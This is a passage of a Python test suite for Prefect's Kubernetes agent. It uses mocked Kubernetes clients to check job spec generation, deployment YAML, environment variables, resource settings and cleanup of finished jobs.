"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
assert agent
assert agent.agent_config_id is None
assert agent.labels == []
assert agent.name == "agent"
assert agent.batch_client
def test_k8s_agent_config_options(monkeypatch, cloud_api):
k8s_client = MagicMock()
monkeypatch.setattr("kubernetes.client", k8s_client)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = KubernetesAgent(name="test", labels=["test"], namespace="namespace")
assert agent
assert agent.labels == ["test"]
assert agent.name == "test"
assert agent.namespace == "namespace"
assert agent.client.get_auth_token() == "TEST_TOKEN"
assert agent.logger
assert agent.batch_client
@pytest.mark.parametrize(
"core_version,command",
[
("0.10.0", "prefect execute cloud-flow"),
("0.6.0+134", "prefect execute cloud-flow"),
("0.13.0", "prefect execute flow-run"),
("0.13.1+134", "prefect execute flow-run"),
],
)
def test_k8s_agent_deploy_flow(core_version, command, monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": core_version,
}
),
"id": "id",
}
)
)
assert agent.batch_client.create_namespaced_job.called
assert (
agent.batch_client.create_namespaced_job.call_args[1]["namespace"] == "default"
)
assert (
agent.batch_client.create_namespaced_job.call_args[1]["body"]["apiVersion"]
== "batch/v1"
)
assert agent.batch_client.create_namespaced_job.call_args[1]["body"]["spec"][
"template"
]["spec"]["containers"][0]["args"] == [command]
def test_k8s_agent_deploy_flow_uses_environment_metadata(monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Local().serialize(),
"environment": LocalEnvironment(
metadata={"image": "repo/name:tag"}
).serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
)
assert agent.batch_client.create_namespaced_job.called
assert (
agent.batch_client.create_namespaced_job.call_args[1]["body"]["spec"][
"template"
]["spec"]["containers"][0]["image"]
== "repo/name:tag"
)
def test_k8s_agent_deploy_flow_raises(monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
with pytest.raises(ValueError):
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Local().serialize(),
"id": "id",
"environment": LocalEnvironment().serialize(),
"core_version": "0.13.0",
}
),
"id": "id",
}
)
)
assert not agent.batch_client.create_namespaced_job.called
def test_k8s_agent_replace_yaml_uses_user_env_vars(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "my-secret")
monkeypatch.setenv("JOB_MEM_REQUEST", "mr")
monkeypatch.setenv("JOB_MEM_LIMIT", "ml")
monkeypatch.setenv("JOB_CPU_REQUEST", "cr")
monkeypatch.setenv("JOB_CPU_LIMIT", "cl")
monkeypatch.setenv("IMAGE_PULL_POLICY", "custom_policy")
monkeypatch.setenv("SERVICE_ACCOUNT_NAME", "svc_name")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
agent = KubernetesAgent(env_vars=dict(AUTH_THING="foo", PKG_SETTING="bar"))
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert job["metadata"]["labels"]["prefect.io/flow_run_id"] == "id"
assert job["metadata"]["labels"]["prefect.io/flow_id"] == "new_id"
assert (
job["spec"]["template"]["metadata"]["labels"]["prefect.io/flow_run_id"]
== "id"
)
assert (
job["spec"]["template"]["spec"]["containers"][0]["image"] == "test/name:tag"
)
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[0]["value"] == "https://api.prefect.io"
assert env[1]["value"] == "token"
assert env[2]["value"] == "id"
assert env[3]["value"] == "new_id"
assert env[4]["value"] == "default"
assert env[5]["value"] == "[]"
assert env[6]["value"] == "true"
user_vars = [
dict(name="AUTH_THING", value="foo"),
dict(name="PKG_SETTING", value="bar"),
]
assert env[-1] in user_vars
assert env[-2] in user_vars
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== "custom_policy"
)
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "svc_name"
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "my-secret"}
]
def test_k8s_agent_replace_yaml_respects_multiple_image_secrets(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "some-secret,other-secret")
monkeypatch.setenv("IMAGE_PULL_POLICY", "custom_policy")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
agent = KubernetesAgent(env_vars=dict(AUTH_THING="foo", PKG_SETTING="bar"))
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
expected_secrets = [{"name": "some-secret"}, {"name": "other-secret"}]
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == expected_secrets
def test_k8s_agent_replace_yaml(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "my-secret")
monkeypatch.setenv("JOB_MEM_REQUEST", "mr")
monkeypatch.setenv("JOB_MEM_LIMIT", "ml")
monkeypatch.setenv("JOB_CPU_REQUEST", "cr")
monkeypatch.setenv("JOB_CPU_LIMIT", "cl")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
volume_mounts = [{"name": "my-vol", "mountPath": "/mnt/my-mount"}]
volumes = [{"name": "my-vol", "hostPath": "/host/folder"}]
agent = KubernetesAgent(volume_mounts=volume_mounts, volumes=volumes)
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert job["metadata"]["labels"]["prefect.io/flow_run_id"] == "id"
assert job["metadata"]["labels"]["prefect.io/flow_id"] == "new_id"
assert (
job["spec"]["template"]["metadata"]["labels"]["prefect.io/flow_run_id"]
== "id"
)
assert (
job["spec"]["template"]["spec"]["containers"][0]["image"] == "test/name:tag"
)
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[0]["value"] == "https://api.prefect.io"
assert env[1]["value"] == "token"
assert env[2]["value"] == "id"
assert env[3]["value"] == "new_id"
assert env[4]["value"] == "default"
assert env[5]["value"] == "[]"
assert env[6]["value"] == "true"
assert (
job["spec"]["template"]["spec"]["imagePullSecrets"][0]["name"]
== "my-secret"
)
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
assert resources["requests"]["memory"] == "mr"
assert resources["limits"]["memory"] == "ml"
assert resources["requests"]["cpu"] == "cr"
assert resources["limits"]["cpu"] == "cl"
volumeMounts = job["spec"]["template"]["spec"]["containers"][0]["volumeMounts"]
assert volumeMounts[0]["name"] == "my-vol"
assert volumeMounts[0]["mountPath"] == "/mnt/my-mount"
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== "IfNotPresent"
)
volumes = job["spec"]["template"]["spec"]["volumes"]
assert volumes[0]["name"] == "my-vol"
assert volumes[0]["hostPath"] == "/host/folder"
assert job["spec"]["template"]["spec"].get("serviceAccountName", None) is None
@pytest.mark.parametrize("flag", [True, False])
def test_k8s_agent_replace_yaml_responds_to_logging_config(
monkeypatch, cloud_api, flag
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
"name": "name",
}
)
agent = KubernetesAgent(no_cloud_logs=flag)
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[6]["value"] == str(not flag).lower()
def test_k8s_agent_replace_yaml_no_pull_secrets(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent()
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert not job["spec"]["template"]["spec"].get("imagePullSecrets", None)
def test_k8s_agent_removes_yaml_no_volume(monkeypatch, cloud_api):
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent()
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert not job["spec"]["template"]["spec"].get("volumes", None)
assert not job["spec"]["template"]["spec"]["containers"][0].get(
"volumeMounts", None
)
def test_k8s_agent_includes_agent_labels_in_job(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent(labels=["foo", "bar"])
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[5]["value"] == "['foo', 'bar']"
def test_k8s_agent_generate_deployment_yaml(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
backend="backend-test",
)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[0]["value"] == "test_token"
assert agent_env[1]["value"] == "test_api"
assert agent_env[2]["value"] == "test_namespace"
assert agent_env[11]["value"] == "backend-test"
def test_k8s_agent_generate_deployment_yaml_env_vars(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
env_vars = {"test1": "test2", "test3": "test4"}
deployment = agent.generate_deployment_yaml(env_vars=env_vars)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[13]["name"] == "PREFECT__CLOUD__AGENT__ENV_VARS"
assert agent_env[13]["value"] == json.dumps(env_vars)
def test_k8s_agent_generate_deployment_yaml_backend_default(monkeypatch, server_api):
c = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Client", c)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml()
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[11]["value"] == "server"
@pytest.mark.parametrize(
"version",
[
("0.6.3", "0.6.3-python3.6"),
("0.5.3+114.g35bc7ba4", "latest"),
("0.5.2+999.gr34343.dirty", "latest"),
],
)
def test_k8s_agent_generate_deployment_yaml_local_version(
monkeypatch, version, cloud_api
):
monkeypatch.setattr(prefect, "__version__", version[0])
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
)
deployment = yaml.safe_load(deployment)
agent_yaml = deployment["spec"]["template"]["spec"]["containers"][0]
assert agent_yaml["image"] == "prefecthq/prefect:{}".format(version[1])
def test_k8s_agent_generate_deployment_yaml_latest(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
latest=True,
)
deployment = yaml.safe_load(deployment)
agent_yaml = deployment["spec"]["template"]["spec"]["containers"][0]
assert agent_yaml["image"] == "prefecthq/prefect:latest"
def test_k8s_agent_generate_deployment_yaml_labels(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
labels=["test_label1", "test_label2"],
)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[0]["value"] == "test_token"
assert agent_env[1]["value"] == "test_api"
assert agent_env[2]["value"] == "test_namespace"
assert agent_env[4]["value"] == "['test_label1', 'test_label2']"
assert len(deployment["spec"]["template"]["spec"]["containers"]) == 1
def test_k8s_agent_generate_deployment_yaml_no_image_pull_secrets(
monkeypatch, cloud_api
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token", api="test_api", namespace="test_namespace"
)
deployment = yaml.safe_load(deployment)
assert deployment["spec"]["template"]["spec"].get("imagePullSecrets") is None
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[3]["value"] == ""
def test_k8s_agent_generate_deployment_yaml_contains_image_pull_secrets(
monkeypatch, cloud_api
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
image_pull_secrets="secrets",
)
deployment = yaml.safe_load(deployment)
assert (
deployment["spec"]["template"]["spec"]["imagePullSecrets"][0]["name"]
== "secrets"
)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[3]["value"] == "secrets"
def test_k8s_agent_generate_deployment_yaml_contains_resources(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
mem_request="mr",
mem_limit="ml",
cpu_request="cr",
cpu_limit="cl",
image_pull_policy="custom_policy",
service_account_name="svc",
)
deployment = yaml.safe_load(deployment)
env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[5]["value"] == "mr"
assert env[6]["value"] == "ml"
assert env[7]["value"] == "cr"
assert env[8]["value"] == "cl"
assert env[9]["value"] == "custom_policy"
assert env[10]["value"] == "svc"
def test_k8s_agent_generate_deployment_yaml_rbac(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token", api="test_api", namespace="test_namespace", rbac=True
)
deployment = yaml.safe_load_all(deployment)
for document in deployment:
if "rbac" in document:
assert "rbac" in document["apiVersion"]
assert document["metadata"]["namespace"] == "test_namespace"
assert document["metadata"]["name"] == "prefect-agent-rbac"
def test_k8s_agent_manage_jobs_pass(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.heartbeat()
def test_k8s_agent_manage_jobs_delete_jobs(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = True
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
batch_client.delete_namespaced_job.return_value = None
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert batch_client.delete_namespaced_job.called
def test_k8s_agent_manage_jobs_does_not_delete_if_disabled(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = True
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
batch_client.delete_namespaced_job.return_value = None
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent(delete_finished_jobs=False)
agent.manage_jobs()
assert not batch_client.delete_namespaced_job.called
def test_k8s_agent_manage_jobs_reports_failed_pods(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
write_run_logs=None,
get_flow_run_state=prefect.engine.state.Success(),
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Failed"
terminated = MagicMock()
terminated.exit_code = "code"
terminated.message = "message"
terminated.reason = "reason"
terminated.signal = "signal"
c_status = MagicMock()
c_status.state.terminated = terminated
pod.status.container_statuses = [c_status]
pod2 = MagicMock()
pod2.metadata.name = "pod_name"
pod2.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod, pod2]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert core_client.list_namespaced_pod.called
def test_k8s_agent_manage_jobs_reports_empty_status(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
write_run_logs=None,
get_flow_run_state=prefect.engine.state.Success(),
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Failed"
pod.status.container_statuses = None
pod2 = MagicMock()
pod2.metadata.name = "pod_name"
pod2.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod, pod2]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert core_client.list_namespaced_pod.called
def test_k8s_agent_manage_jobs_client_call(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(set_flow_run_state=None))
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
c_status = MagicMock()
c_status.state.waiting.reason = "ErrImagePull"
pod.status.container_statuses = [c_status]
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
def test_k8s_agent_manage_jobs_continues_on_client_error(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(set_flow_run_state=None))
)
client = MagicMock()
client.return_value.graphql = gql_return
client.return_value.set_flow_run_state = MagicMock(side_effect=ClientError)
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
c_status = MagicMock()
c_status.state.waiting.reason = "ErrImagePull"
pod.status.container_statuses = [c_status]
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
def test_k8s_agent_manage_pending_pods(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, write_run_logs=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
dt = pendulum.now()
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Pending"
event = MagicMock()
event.last_timestamp = dt
event.reason = "reason"
event.message = "message"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
list_events = MagicMock()
list_events.items = [event]
core_client.list_namespaced_pod.return_value = list_pods
core_client.list_namespaced_event.return_value = list_events
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert agent.job_pod_event_timestamps["my_job"]["pod_name"] == dt
class TestK8sAgentRunConfig:
def setup(self):
self.agent = KubernetesAgent(
namespace="testing",
)
def read_default_template(self):
from prefect.agent.kubernetes.agent import DEFAULT_JOB_TEMPLATE_PATH
with open(DEFAULT_JOB_TEMPLATE_PATH) as f:
return yaml.safe_load(f)
def build_flow_run(self, config, storage=None, core_version="0.13.0"):
if storage is None:
storage = Local()
return GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": storage.serialize(),
"id": "new_id",
"core_version": core_version,
}
),
"run_config": None if config is None else config.serialize(),
"id": "id",
}
)
@pytest.mark.parametrize("run_config", [None, UniversalRun()])
def test_generate_job_spec_null_or_universal_run_config(self, run_config):
self.agent.generate_job_spec_from_run_config = MagicMock(
wraps=self.agent.generate_job_spec_from_run_config
)
flow_run = self.build_flow_run(run_config)
self.agent.generate_job_spec(flow_run)
assert self.agent.generate_job_spec_from_run_config.called
def test_generate_job_spec_errors_if_non_kubernetesrun_run_config(self):
with pytest.raises(
TypeError,
match="`run_config` of type `LocalRun`, only `KubernetesRun` is supported",
):
self.agent.generate_job_spec(self.build_flow_run(LocalRun()))
def test_generate_job_spec_uses_job_template_provided_in_run_config(self):
template = self.read_default_template()
labels = template.setdefault("metadata", {}).setdefault("labels", {})
labels["TEST"] = "VALUE"
flow_run = self.build_flow_run(KubernetesRun(job_template=template))
job = self.agent.generate_job_spec(flow_run)
assert job["metadata"]["labels"]["TEST"] == "VALUE"
def test_generate_job_spec_uses_job_template_path_provided_in_run_config(
self, tmpdir, monkeypatch
):
path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
labels = template.setdefault("metadata", {}).setdefault("labels", {})
labels["TEST"] = "VALUE"
with open(path, "w") as f:
yaml.safe_dump(template, f)
template_path = f"agent://{path}"
flow_run = self.build_flow_run(KubernetesRun(job_template_path=template_path))
mocked_read_bytes = MagicMock(wraps=read_bytes_from_path)
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.read_bytes_from_path", mocked_read_bytes
)
job = self.agent.generate_job_spec(flow_run)
assert job["metadata"]["labels"]["TEST"] == "VALUE"
assert mocked_read_bytes.call_args[0] == (template_path,)
def test_generate_job_spec_metadata(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
